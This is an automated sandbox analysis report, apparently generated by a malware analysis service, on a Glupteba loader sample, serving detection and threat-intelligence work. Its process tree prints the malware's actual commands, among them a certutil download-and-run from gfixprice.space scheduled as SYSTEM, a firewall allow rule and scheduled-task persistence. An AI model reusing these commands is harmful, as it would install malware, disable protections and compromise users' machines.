Analysis

  • max time kernel
    25s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    24-05-2022 22:11

General

  • Target

    42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf.exe

  • Size

    3.9MB

  • MD5

    c3abfb427c8238dc3fb5a62fb9b048d5

  • SHA1

    7fed650295f4b5ffe2388ac5e19b6cc3e4c16601

  • SHA256

    42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf

  • SHA512

    59ac9803102c17756338de539a718120cf95c44c4e2a5ef0bfa9d7aa5523d99ca9fd1784d3975581c401a5cc572aa04eb1380bcfc684a04011b85752f004661f

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf.exe
    "C:\Users\Admin\AppData\Local\Temp\42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1464
    • C:\Users\Admin\AppData\Local\Temp\42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf.exe
      "C:\Users\Admin\AppData\Local\Temp\42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf.exe"
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783\d26671056783.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783\d26671056783.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:684
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
          PID:1976
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
            4⤵
            • Creates scheduled task(s)
            PID:1064
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:1880
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            4⤵
              PID:968
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:1896
      • C:\Windows\system32\makecab.exe
        "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220525001210.log C:\Windows\Logs\CBS\CbsPersist_20220525001210.cab
        1⤵
        • Drops file in Windows directory
        PID:1736

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        c3abfb427c8238dc3fb5a62fb9b048d5

        SHA1

        7fed650295f4b5ffe2388ac5e19b6cc3e4c16601

        SHA256

        42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf

        SHA512

        59ac9803102c17756338de539a718120cf95c44c4e2a5ef0bfa9d7aa5523d99ca9fd1784d3975581c401a5cc572aa04eb1380bcfc684a04011b85752f004661f

      • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • \Users\Admin\AppData\Local\Temp\dbghelp.dll
        Filesize

        1.5MB

        MD5

        f0616fa8bc54ece07e3107057f74e4db

        SHA1

        b33995c4f9a004b7d806c4bb36040ee844781fca

        SHA256

        6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

        SHA512

        15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

      • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
        Filesize

        5.3MB

        MD5

        1afff8d5352aecef2ecd47ffa02d7f7d

        SHA1

        8b115b84efdb3a1b87f750d35822b2609e665bef

        SHA256

        c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

        SHA512

        e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
        Filesize

        5.3MB

        MD5

        1afff8d5352aecef2ecd47ffa02d7f7d

        SHA1

        8b115b84efdb3a1b87f750d35822b2609e665bef

        SHA256

        c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

        SHA512

        e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
        Filesize

        5.3MB

        MD5

        1afff8d5352aecef2ecd47ffa02d7f7d

        SHA1

        8b115b84efdb3a1b87f750d35822b2609e665bef

        SHA256

        c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

        SHA512

        e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      • \Users\Admin\AppData\Local\Temp\osloader.exe
        Filesize

        591KB

        MD5

        e2f68dc7fbd6e0bf031ca3809a739346

        SHA1

        9c35494898e65c8a62887f28e04c0359ab6f63f5

        SHA256

        b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

        SHA512

        26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      • \Users\Admin\AppData\Local\Temp\osloader.exe
        Filesize

        591KB

        MD5

        e2f68dc7fbd6e0bf031ca3809a739346

        SHA1

        9c35494898e65c8a62887f28e04c0359ab6f63f5

        SHA256

        b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

        SHA512

        26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      • \Users\Admin\AppData\Local\Temp\osloader.exe
        Filesize

        591KB

        MD5

        e2f68dc7fbd6e0bf031ca3809a739346

        SHA1

        9c35494898e65c8a62887f28e04c0359ab6f63f5

        SHA256

        b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

        SHA512

        26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      • \Users\Admin\AppData\Local\Temp\symsrv.dll
        Filesize

        163KB

        MD5

        5c399d34d8dc01741269ff1f1aca7554

        SHA1

        e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

        SHA256

        e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

        SHA512

        8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

      • \Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        c3abfb427c8238dc3fb5a62fb9b048d5

        SHA1

        7fed650295f4b5ffe2388ac5e19b6cc3e4c16601

        SHA256

        42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf

        SHA512

        59ac9803102c17756338de539a718120cf95c44c4e2a5ef0bfa9d7aa5523d99ca9fd1784d3975581c401a5cc572aa04eb1380bcfc684a04011b85752f004661f

      • \Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        c3abfb427c8238dc3fb5a62fb9b048d5

        SHA1

        7fed650295f4b5ffe2388ac5e19b6cc3e4c16601

        SHA256

        42ede32137e2dfccbe5a6c06da78b8814b14b521364250a948088442c7b5cedf

        SHA512

        59ac9803102c17756338de539a718120cf95c44c4e2a5ef0bfa9d7aa5523d99ca9fd1784d3975581c401a5cc572aa04eb1380bcfc684a04011b85752f004661f

      • memory/684-63-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp
        Filesize

        8KB

      • memory/684-62-0x0000000000000000-mapping.dmp
      • memory/1100-61-0x0000000000400000-0x0000000000D2D000-memory.dmp
        Filesize

        9.2MB

      • memory/1100-60-0x0000000002740000-0x0000000002AE7000-memory.dmp
        Filesize

        3.7MB

      • memory/1100-58-0x0000000002740000-0x0000000002AE7000-memory.dmp
        Filesize

        3.7MB

      • memory/1464-54-0x0000000002740000-0x0000000002AE7000-memory.dmp
        Filesize

        3.7MB

      • memory/1464-57-0x0000000000400000-0x0000000000D2D000-memory.dmp
        Filesize

        9.2MB

      • memory/1464-56-0x0000000002AF0000-0x00000000031E6000-memory.dmp
        Filesize

        7.0MB

      • memory/1464-55-0x0000000002740000-0x0000000002AE7000-memory.dmp
        Filesize

        3.7MB

      • memory/1624-59-0x0000000000000000-mapping.dmp
      • memory/1896-84-0x0000000000000000-mapping.dmp
      • memory/1976-70-0x0000000000400000-0x0000000000D2D000-memory.dmp
        Filesize

        9.2MB

      • memory/1976-69-0x00000000027D0000-0x0000000002B77000-memory.dmp
        Filesize

        3.7MB

      • memory/1976-68-0x00000000027D0000-0x0000000002B77000-memory.dmp
        Filesize

        3.7MB

      • memory/1976-66-0x0000000000000000-mapping.dmp